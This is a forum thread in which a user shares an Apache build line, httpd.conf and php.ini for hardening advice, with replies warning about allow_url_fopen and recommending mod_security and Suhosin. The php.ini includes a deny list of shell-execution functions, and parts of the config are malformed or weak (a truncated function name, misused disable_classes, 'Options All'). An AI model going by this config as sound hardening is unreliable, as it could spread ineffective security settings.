View All Products
Compute
Storage
Networking
Databases
Services
Developer Tools
Industries
Pricing
Community
Engage With Us
Community Questions Optimizing/Securing Apache & PHP
Log in to Ask a Question

Optimizing/Securing Apache & PHP

development

Any tips for securing and increasing the speed of apache?

My current Setup:

APACHE:

Compile:

./configure --prefix=/usr/local/apache2 --with-mpm=prefork --enable-mods-shared='rewrite ssl' --enable-rewrite --enable-ssl --with-ssl --disable-env --disable-status --disable-autoindex --disable-cgi --disable-userdir --disable-actions --disable-asis --enable-deflate --enable-so

Compiled in modules:

core.c

modauthnfile.c

modauthndefault.c

modauthzhost.c

modauthzgroupfile.c

modauthzuser.c

modauthzdefault.c

modauthbasic.c

mod_filter.c

modlogconfig.c

prefork.c

http_core.c

mod_mime.c

mod_dir.c

mod_actions.c

mod_alias.c

mod_so.c

httpd.conf

ServerRoot "/usr/local/apache2"
Listen 80
LoadModule php5_module    modules/libphp5.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule deflate_module modules/mod_deflate.so
 <ifmodule !mpm_netware_module=""><ifmodule !mpm_winnt_module="">User daemon
Group daemon</ifmodule></ifmodule> 
ServerAdmin admin@domain.org
ServerName domain.org:80
DocumentRoot "/www"
UseCanonicalName Off 
ServerSignature Off 
HostnameLookups Off 
ServerTokens Prod  
PidFile /usr/local/apache2/logs/httpd.pid 
ScoreBoardFile /usr/local/apache2/logs/httpd.scoreboard 
Timeout 300 
KeepAlive On 
MaxKeepAliveRequests 100 
KeepAliveTimeout 15 
 <ifmodule prefork.c="">MinSpareServers 5 
    MaxSpareServers 10 
    StartServers 5 
    MaxClients 150 
    MaxRequestsPerChild 0</ifmodule> 
 <ifmodule mod_deflate.c="">SetOutputFilter DEFLATE
SetInputFilter DEFLATE
AddOutputFilterByType DEFLATE application/x-httpd-php application/x-httpd-fastphp application/x-httpd-eruby text/html 
DeflateFilterNote ratio
DeflateCompressionLevel 3</ifmodule> 
 <directory>Options None
    AllowOverride None
    Order deny,allow
    Deny from all</directory> 
 <directory www="">Options None
    AllowOverride None
    Order deny,allow
    Deny from all</directory> 
 <directory "="" www="" domain.org="" html"="">Options All
    AllowOverride All
    Order allow,deny
    Allow from all
SetOutputFilter DEFLATE
SetInputFilter DEFLATE
AddOutputFilterByType DEFLATE application/x-httpd-php application/x-httpd-fastphp application/x-httpd-eruby text/html</directory> 
 <ifmodule dir_module="">DirectoryIndex index.php index.html</ifmodule> 
 <filesmatch "^\.ht"="">Order allow,deny
    Deny from all
    Satisfy All</filesmatch> 
ErrorLog "logs/error_log"
LogLevel debug
 <ifmodule log_config_module="">LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
    <ifmodule logio_module="">LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio</ifmodule> 
    CustomLog "logs/access_log" common</ifmodule> 
 <ifmodule alias_module="">ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"</ifmodule> 

 <directory "="" usr="" local="" apache2="" cgi-bin"="">AllowOverride None
    Options None
    Order allow,deny
    Allow from all</directory> 
DefaultType text/plain
 <ifmodule mime_module="">TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
    AddType application/x-httpd-php .php</ifmodule> 
NameVirtualHost domain.org:80
 <virtualhost domain.org:80="">DocumentRoot "/www/domain.org/html"
    ServerName "domain.org"
    ServerAlias "domain.org"
    ErrorLog /www/domain.org/logs/error_log
    CustomLog /www/domain.org/logs/access_log combined</virtualhost> 
 <ifmodule ssl_module="">SSLRandomSeed startup builtin
SSLRandomSeed connect builtin</ifmodule>

PHP:

Compile:

Default

php.ini

engine = On
zend.ze1_compatibility_mode = Off
short_open_tag = On
asp_tags = Off
precision    =  14
y2k_compliance = On
output_buffering = 4096
zlib.output_compression = Off
implicit_flush = Off
unserialize_callback_func=
serialize_precision = 100
allow_call_time_pass_reference = Off
safe_mode = On
safe_mode_gid = Off
safe_mode_include_dir =
safe_mode_exec_dir =
safe_mode_allowed_env_vars = PHP_
safe_mode_protected_env_vars = LD_LIBRARY_PATH
disable_functions = phpinfo,dir,readfile,shell_exec,exec,virtual,passthru,proc_close,proc_get_status,proc_open,proc_terminate,syste
disable_classes = ni_get(), phpinfo(), shell_exec(), popen()
expose_php = Off
max_execution_time = 30     ; Maximum execution time of each script, in seconds
max_input_time = 60    ; Maximum amount of time each script may spend parsing request data
memory_limit = 16M      ; Maximum amount of memory a script may consume
error_reporting  =  E_ALL
display_errors = Off
display_startup_errors = Off
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = Off
ignore_repeated_source = Off
report_memleaks = On
track_errors = Off
variables_order = "EGPCS"
register_globals = Off
register_long_arrays = Off
register_argc_argv = Off
auto_globals_jit = On
post_max_size = 8M
magic_quotes_gpc = Off
magic_quotes_runtime = Off
magic_quotes_sybase = Off
auto_prepend_file =
auto_append_file =
default_mimetype = "text/html"
doc_root =
user_dir =
extension_dir = "/usr/lib/php/modules"
enable_dl = On
file_uploads = Off
upload_max_filesize = 20M
allow_url_fopen = On
default_socket_timeout = 60

9 Replies

One thing pops right out

allow_url_fopen = On

Very, very bad idea having this enabled

If you need the functionality use Curl

@marcus0263:

One thing pops right out

allow_url_fopen = On

Very, very bad idea having this enabled

If you need the functionality use Curl
Thanks, fixed. I pretty much only need core features to display PHP pages.

@marcus0263:

One thing pops right out

allow_url_fopen = On

Very, very bad idea having this enabled

If you need the functionality use Curl

What's so bad about that? :P

@kupesoft:

@marcus0263:

One thing pops right out

allow_url_fopen = On

Very, very bad idea having this enabled

If you need the functionality use Curl

What's so bad about that? :P

Google is your friend ;)

@kupesoft:

@marcus0263:

One thing pops right out

allow_url_fopen = On

Very, very bad idea having this enabled

If you need the functionality use Curl

What's so bad about that? :P

From PHPSec.org:

If enabled, allowurlfopen allows PHP's file functions – such as filegetcontents() and the include and require statements -- can retrieve data from remote locations, like an FTP or web site. Programmers frequently forget this and don't do proper input filtering when passing user-provided data to these functions, opening them up to code injection vulnerabilities. A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allowurlfopen and bad input filtering.

Did some more research and found out about modsecurity and modsuphp, so I guess I'll be giving those a try for some extra security.

Out of curiosity, did you ever manage to get mod_sec installed? If so, how is it?

I answered my own question (:->) I had forgotten to set up a domain zone for the second domain name in DNS manager!

Do I have to wait for a bit before this takes effect, or do I have to reboot the linode?

For php - I recommend using suhosin

http://www.hardened-php.net/suhosin/

It has a loadable module and a patch to php for what can not be done via loadable module.

It does break some software, however, in my experience - the software it breaks is typically doing things the wrong (insecure) way, and it breaks because suhosin is doing exactly what it should do.

Reply

Please enter an answer
Tips:

You can mention users to notify them: @username

You can use Markdown to format your question. For more examples see the Markdown Cheatsheet.

> I’m a blockquote.

I’m a blockquote.

[I'm a link] (https://www.google.com)

I'm a link

**I am bold** I am bold

*I am italicized* I am italicized

Log in to Reply
Community Code of Conduct